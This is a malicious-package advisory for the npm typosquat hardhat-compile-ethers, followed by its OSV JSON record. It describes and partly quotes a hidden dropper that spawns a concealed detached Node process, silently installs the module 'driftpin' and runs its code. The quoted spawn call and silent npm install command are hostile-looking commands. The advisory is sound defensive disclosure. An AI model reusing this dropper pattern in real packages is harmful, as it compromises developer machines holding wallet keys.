mal-2026-6705
Vulnerability from ossf_malicious_packages
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)
The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then require('driftpin') and invoke getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "dist/src/index.js",
"sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
"tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
},
{
"path": "package.json",
"sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
"tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
}
],
"package_integrity": [
{
"filename": "hardhat-compile-ethers-0.4.7.tgz",
"hashes": {
"sha1": "e718d781b11897329c9747c5fd57a1677ea24110",
"sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "hardhat-compile-ethers"
},
"versions": [
"0.4.7",
"0.4.10",
"0.4.12",
"0.4.11",
"0.4.8",
"0.4.6",
"0.4.5",
"0.4.4",
"0.4.2",
"0.4.0",
"0.4.3",
"0.0.1",
"0.4.9"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007865",
"import_time": "2026-07-01T19:11:25.632444026Z",
"modified_time": "2026-07-01T18:42:56Z",
"sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
"source": "amazon-inspector",
"versions": [
"0.4.7"
]
},
{
"id": "IN-MAL-2026-007863",
"import_time": "2026-07-01T19:11:25.404233578Z",
"modified_time": "2026-07-01T18:42:38Z",
"sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
"source": "amazon-inspector",
"versions": [
"0.4.10"
]
},
{
"id": "IN-MAL-2026-007856",
"import_time": "2026-07-01T19:11:24.475165466Z",
"modified_time": "2026-07-01T18:41:35Z",
"sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
"source": "amazon-inspector",
"versions": [
"0.4.12"
]
},
{
"id": "IN-MAL-2026-007861",
"import_time": "2026-07-01T19:11:25.142169343Z",
"modified_time": "2026-07-01T18:42:18Z",
"sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
"source": "amazon-inspector",
"versions": [
"0.4.11"
]
},
{
"id": "IN-MAL-2026-007864",
"import_time": "2026-07-01T19:11:25.528163378Z",
"modified_time": "2026-07-01T18:42:46Z",
"sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
"source": "amazon-inspector",
"versions": [
"0.4.8"
]
},
{
"id": "IN-MAL-2026-007866",
"import_time": "2026-07-01T19:11:25.775808651Z",
"modified_time": "2026-07-01T18:43:07Z",
"sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
"source": "amazon-inspector",
"versions": [
"0.4.6"
]
},
{
"id": "IN-MAL-2026-007870",
"import_time": "2026-07-01T19:11:26.226038725Z",
"modified_time": "2026-07-01T18:43:43Z",
"sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
"source": "amazon-inspector",
"versions": [
"0.4.5"
]
},
{
"id": "IN-MAL-2026-007869",
"import_time": "2026-07-01T19:11:26.129866344Z",
"modified_time": "2026-07-01T18:43:34Z",
"sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
"source": "amazon-inspector",
"versions": [
"0.4.4"
]
},
{
"id": "IN-MAL-2026-007867",
"import_time": "2026-07-01T19:11:25.903639151Z",
"modified_time": "2026-07-01T18:43:17Z",
"sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
"source": "amazon-inspector",
"versions": [
"0.4.2"
]
},
{
"id": "IN-MAL-2026-007872",
"import_time": "2026-07-01T19:11:26.500370955Z",
"modified_time": "2026-07-01T18:43:59Z",
"sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
"source": "amazon-inspector",
"versions": [
"0.4.0"
]
},
{
"id": "IN-MAL-2026-007868",
"import_time": "2026-07-01T19:11:26.029254479Z",
"modified_time": "2026-07-01T18:43:25Z",
"sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
"source": "amazon-inspector",
"versions": [
"0.4.3"
]
},
{
"id": "IN-MAL-2026-007871",
"import_time": "2026-07-01T19:11:26.358013817Z",
"modified_time": "2026-07-01T18:43:50Z",
"sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
"source": "amazon-inspector",
"versions": [
"0.0.1"
]
},
{
"id": "IN-MAL-2026-007862",
"import_time": "2026-07-01T19:11:25.289124822Z",
"modified_time": "2026-07-01T18:42:31Z",
"sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
"source": "amazon-inspector",
"versions": [
"0.4.9"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)\nThe package\u0027s main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user\u0027s config), it spawns a detached Node child (`spawn(process.execPath, [\u0027-e\u0027, code], {detached:true, stdio:\u0027ignore\u0027, windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require(\u0027driftpin\u0027)` and invoke `getPlugin()()`, executing attacker-controlled code in the installer\u0027s Node process. Both the shell command and the module name \u0027driftpin\u0027 are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.\n",
"id": "MAL-2026-6705",
"modified": "2026-07-01T19:13:18Z",
"published": "2026-07-01T18:41:35Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in hardhat-compile-ethers (npm)"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.